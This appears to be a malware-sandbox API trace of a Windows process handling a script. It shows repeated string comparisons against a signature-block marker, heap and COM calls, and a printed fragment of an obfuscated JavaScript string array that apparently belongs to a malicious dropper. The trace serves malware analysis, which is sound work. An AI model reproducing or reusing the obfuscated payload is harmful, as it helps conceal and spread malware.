	[0052.670] wcsncmp (_String1="K5HsOefsOg','MErCsEPDhcKacRHCmA==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0052.670] wcsncmp (_String1="5HsOefsOg','MErCsEPDhcKacRHCmA=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0052.670] wcsncmp (_String1="HsOefsOg','MErCsEPDhcKacRHCmA==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0052.670] wcsncmp (_String1="sOefsOg','MErCsEPDhcKacRHCmA==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0052.670] wcsncmp (_String1="OefsOg','MErCsEPDhcKacRHCmA==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0052.670] wcsncmp (_String1="efsOg','MErCsEPDhcKacRHCmA==','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0052.670] wcsncmp (_String1="fsOg','MErCsEPDhcKacRHCmA==','woz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0052.670] wcsncmp (_String1="sOg','MErCsEPDhcKacRHCmA==','wozD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0052.670] wcsncmp (_String1="Og','MErCsEPDhcKacRHCmA==','wozDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0052.670] wcsncmp (_String1="g','MErCsEPDhcKacRHCmA==','wozDhs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0052.670] wcsncmp (_String1="','MErCsEPDhcKacRHCmA==','wozDhsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0052.670] wcsncmp (_String1=",'MErCsEPDhcKacRHCmA==','wozDhsKi", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0052.670] wcsncmp (_String1="'MErCsEPDhcKacRHCmA==','wozDhsKiw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0052.671] wcsncmp (_String1="MErCsEPDhcKacRHCmA==','wozDhsKiwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0052.671] wcsncmp (_String1="ErCsEPDhcKacRHCmA==','wozDhsKiwrP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0052.671] wcsncmp (_String1="rCsEPDhcKacRHCmA==','wozDhsKiwrPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0052.671] wcsncmp (_String1="CsEPDhcKacRHCmA==','wozDhsKiwrPDl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0052.671] wcsncmp (_String1="sEPDhcKacRHCmA==','wozDhsKiwrPDl8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0052.671] wcsncmp (_String1="EPDhcKacRHCmA==','wozDhsKiwrPDl8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0052.671] wcsncmp (_String1="PDhcKacRHCmA==','wozDhsKiwrPDl8Kx", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0052.671] wcsncmp (_String1="DhcKacRHCmA==','wozDhsKiwrPDl8KxF", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0052.671] wcsncmp (_String1="hcKacRHCmA==','wozDhsKiwrPDl8KxFA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0052.671] wcsncmp (_String1="cKacRHCmA==','wozDhsKiwrPDl8KxFAY", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0052.671] wcsncmp (_String1="KacRHCmA==','wozDhsKiwrPDl8KxFAY=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0052.671] wcsncmp (_String1="acRHCmA==','wozDhsKiwrPDl8KxFAY='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0052.671] wcsncmp (_String1="cRHCmA==','wozDhsKiwrPDl8KxFAY=',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0052.671] wcsncmp (_String1="RHCmA==','wozDhsKiwrPDl8KxFAY=','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0052.671] wcsncmp (_String1="HCmA==','wozDhsKiwrPDl8KxFAY=','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0052.671] wcsncmp (_String1="CmA==','wozDhsKiwrPDl8KxFAY=','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0052.671] wcsncmp (_String1="mA==','wozDhsKiwrPDl8KxFAY=','woH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 96
	[0052.671] wcsncmp (_String1="A==','wozDhsKiwrPDl8KxFAY=','woHD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0052.671] wcsncmp (_String1="==','wozDhsKiwrPDl8KxFAY=','woHDt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0052.671] wcsncmp (_String1="=','wozDhsKiwrPDl8KxFAY=','woHDt2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0052.671] wcsncmp (_String1="','wozDhsKiwrPDl8KxFAY=','woHDt2Z", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0052.671] wcsncmp (_String1=",'wozDhsKiwrPDl8KxFAY=','woHDt2Zc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0052.671] wcsncmp (_String1="'wozDhsKiwrPDl8KxFAY=','woHDt2ZcP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0052.671] wcsncmp (_String1="wozDhsKiwrPDl8KxFAY=','woHDt2ZcPM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.671] wcsncmp (_String1="ozDhsKiwrPDl8KxFAY=','woHDt2ZcPMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0052.671] wcsncmp (_String1="zDhsKiwrPDl8KxFAY=','woHDt2ZcPMOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0052.671] wcsncmp (_String1="DhsKiwrPDl8KxFAY=','woHDt2ZcPMOsG", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0052.671] wcsncmp (_String1="hsKiwrPDl8KxFAY=','woHDt2ZcPMOsGX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0052.671] wcsncmp (_String1="sKiwrPDl8KxFAY=','woHDt2ZcPMOsGXt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0052.671] wcsncmp (_String1="KiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0052.671] wcsncmp (_String1="iwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0052.671] wcsncmp (_String1="wrPDl8KxFAY=','woHDt2ZcPMOsGXtZQc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.671] wcsncmp (_String1="rPDl8KxFAY=','woHDt2ZcPMOsGXtZQcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0052.672] wcsncmp (_String1="PDl8KxFAY=','woHDt2ZcPMOsGXtZQcOI", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0052.672] wcsncmp (_String1="Dl8KxFAY=','woHDt2ZcPMOsGXtZQcOIw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0052.672] wcsncmp (_String1="l8KxFAY=','woHDt2ZcPMOsGXtZQcOIwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0052.672] wcsncmp (_String1="8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0052.672] wcsncmp (_String1="KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0052.672] wcsncmp (_String1="xFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0052.672] wcsncmp (_String1="FAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57
	[0052.672] wcsncmp (_String1="AY=','woHDt2ZcPMOsGXtZQcOIwrnDj1l", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0052.672] wcsncmp (_String1="Y=','woHDt2ZcPMOsGXtZQcOIwrnDj1lV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 76
	[0052.672] wcsncmp (_String1="=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0052.672] wcsncmp (_String1="','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0052.672] wcsncmp (_String1=",'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0052.672] wcsncmp (_String1="'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOU", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0052.672] wcsncmp (_String1="woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOUR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.672] wcsncmp (_String1="oHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0052.672] wcsncmp (_String1="HDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHf", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0052.672] wcsncmp (_String1="Dt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0052.672] wcsncmp (_String1="t2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0052.672] wcsncmp (_String1="2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0052.672] wcsncmp (_String1="ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0052.672] wcsncmp (_String1="cPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0k", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0052.672] wcsncmp (_String1="PMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0052.672] wcsncmp (_String1="MOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0052.672] wcsncmp (_String1="OsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4t", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0052.672] wcsncmp (_String1="sGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0052.672] wcsncmp (_String1="GXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 58
	[0052.672] wcsncmp (_String1="XtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0052.672] wcsncmp (_String1="tZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4R", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0052.672] wcsncmp (_String1="ZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0052.672] wcsncmp (_String1="QcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0052.672] wcsncmp (_String1="cOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0052.672] wcsncmp (_String1="OIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0052.672] wcsncmp (_String1="IwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 60
	[0052.672] wcsncmp (_String1="wrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0052.672] wcsncmp (_String1="rnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0052.673] wcsncmp (_String1="nDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0052.673] wcsncmp (_String1="Dj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Om", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0052.673] wcsncmp (_String1="j1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0052.673] wcsncmp (_String1="1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0052.673] wcsncmp (_String1="lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5J", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0052.673] wcsncmp (_String1="VNsOURHfDgl0kw4tDw4RSw7HCn8Omw5Jp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0052.673] wcsncmp (_String1="NsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0052.673] wcsncmp (_String1="sOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0052.673] wcsncmp (_String1="OURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0052.673] wcsncmp (_String1="URHfDgl0kw4tDw4RSw7HCn8Omw5JpXDot", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 72
	[0052.673] wcsncmp (_String1="RHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0052.673] wcsncmp (_String1="HfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0052.673] wcsncmp (_String1="fDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0052.673] wcsncmp (_String1="Dgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0052.674] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0052.674] CloseCodeAuthzLevel () returned 0x1
	[0052.674] FreeLibrary (hLibModule=0x7fefd710000) returned 1
	[0052.674] ??2@YAPEAX_K@Z () returned 0x31f3f0
	[0052.747] SysStringLen (param_1="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 0x4b68
	[0052.747] GetProcessHeap () returned 0x340000
	[0052.747] RtlReAllocateHeap (Heap=0x340000, Flags=0x0, Ptr=0x378430, Size=0x11238) returned 0x3aae20
	[0052.748] ??2@YAPEAX_K@Z () returned 0x31f480
	[0052.748] GetCurrentThreadId () returned 0x8c0
	[0052.748] realloc (_Block=0x0, _Size=0xc8) returned 0x31f4e0
	[0052.749] ??2@YAPEAX_K@Z () returned 0x31f5b0
	[0052.749] malloc (_Size=0x1008) returned 0x31a4f0
	[0052.749] ??2@YAPEAX_K@Z () returned 0x31f5f0
	[0052.749] malloc (_Size=0x108) returned 0x317d80
	[0052.749] malloc (_Size=0x208) returned 0x31f7a0
	[0052.750] malloc (_Size=0x200) returned 0x31f9b0
	[0052.750] malloc (_Size=0x408) returned 0x31fbc0
	[0052.750] malloc (_Size=0x2008) returned 0x31b500
	[0052.750] malloc (_Size=0x808) returned 0x31d510
	[0052.751] malloc (_Size=0x1008) returned 0x31dd20
	[0052.752] malloc (_Size=0x4008) returned 0x44dfd0
	[0052.752] malloc (_Size=0x2008) returned 0x451fe0
	[0052.756] malloc (_Size=0x4008) returned 0x453ff0
	[0052.757] malloc (_Size=0x108) returned 0x317e90
	[0052.757] realloc (_Block=0x0, _Size=0x64) returned 0x31ed30
	[0052.757] realloc (_Block=0x0, _Size=0x64) returned 0x31eda0
	[0052.758] realloc (_Block=0x31eda0, _Size=0x38) returned 0x31eda0
	[0052.760] realloc (_Block=0x31f5f0, _Size=0x60) returned 0x31f5f0
	[0052.760] realloc (_Block=0x31f5f0, _Size=0x90) returned 0x31f5f0
	[0052.760] realloc (_Block=0x31f5f0, _Size=0xd8) returned 0x31f5f0
	[0052.761] realloc (_Block=0x31f5f0, _Size=0x140) returned 0x31f5f0
	[0052.761] realloc (_Block=0x31f5f0, _Size=0x1e0) returned 0x31f9b0
	[0052.761] realloc (_Block=0x31f9b0, _Size=0x2d0) returned 0x31ed30
	[0052.761] realloc (_Block=0x31ed30, _Size=0x438) returned 0x478080
	[0052.761] realloc (_Block=0x478080, _Size=0x650) returned 0x478080
	[0052.762] realloc (_Block=0x478080, _Size=0x978) returned 0x478080
	[0052.762] malloc (_Size=0x4008) returned 0x478a10
	[0052.762] realloc (_Block=0x478080, _Size=0xe30) returned 0x47ca20
	[0052.763] malloc (_Size=0x12620) returned 0x47d860
	[0052.764] ??2@YAPEAX_K@Z () returned 0x31f0b0
	[0052.764] free (_Block=0x46c050) 
	[0052.764] free (_Block=0x458000) 
	[0052.764] free (_Block=0x44dfd0) 
	[0052.764] free (_Block=0x31b500) 
	[0052.765] free (_Block=0x31a4f0) 
	[0052.765] ??3@YAXPEAX@Z () returned 0x15720801
	[0052.765] free (_Block=0x47ca20) 
	[0052.765] free (_Block=0x478a10) 
	[0052.765] free (_Block=0x474070) 
	[0052.766] free (_Block=0x470060) 
	[0052.766] free (_Block=0x468040) 
	[0052.766] free (_Block=0x464030) 
	[0052.766] free (_Block=0x460020) 
	[0052.766] free (_Block=0x45c010) 
	[0052.767] free (_Block=0x453ff0) 
	[0052.767] free (_Block=0x451fe0) 
	[0052.767] free (_Block=0x31dd20) 
	[0052.767] free (_Block=0x31d510) 
	[0052.768] free (_Block=0x31fbc0) 
	[0052.768] free (_Block=0x31f7a0) 
	[0052.768] free (_Block=0x317d80) 
	[0052.768] ??2@YAPEAX_K@Z () returned 0x31f5b0
	[0052.768] ??2@YAPEAX_K@Z () returned 0x31f610
	[0052.768] malloc (_Size=0x10) returned 0x31f640
	[0052.768] free (_Block=0x31f4e0) 
	[0052.768] ??2@YAPEAX_K@Z () returned 0x31f4e0
	[0052.769] CoGetObjectContext (in: riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24efe8 | out: ppv=0x24efe8*=0x35f420) returned 0x0
	[0052.908] ??2@YAPEAX_K@Z () returned 0x31f560
	[0052.909] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x7fefec0a1b0, pUnk=0x31f560, riid=0x7fee3286340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x31f598 | out: pdwCookie=0x31f598*=0x100) returned 0x0
	[0052.909] IUnknown:AddRef (This=0x35f420) returned 0x2
